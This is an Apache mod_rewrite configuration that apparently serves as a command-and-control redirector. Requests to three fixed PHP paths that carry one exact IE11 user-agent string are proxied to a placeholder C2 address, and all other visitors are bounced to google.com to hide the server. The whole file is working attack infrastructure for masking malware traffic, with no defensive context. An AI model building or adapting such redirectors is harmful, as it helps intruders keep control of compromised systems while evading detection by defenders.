RewriteEngine On
RewriteCond %{REQUEST_URI} ^(/admin/get.php|/news.php|/login/process.php)/?$ [NC]
RewriteCond %{HTTP_USER_AGENT} "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" [NC]
RewriteRule ^.*$ "http://<C2_ADDRESS>%{REQUEST_URI}" [P,L]
RewriteRule ^.*$ https://www.google.com [L,R=302]
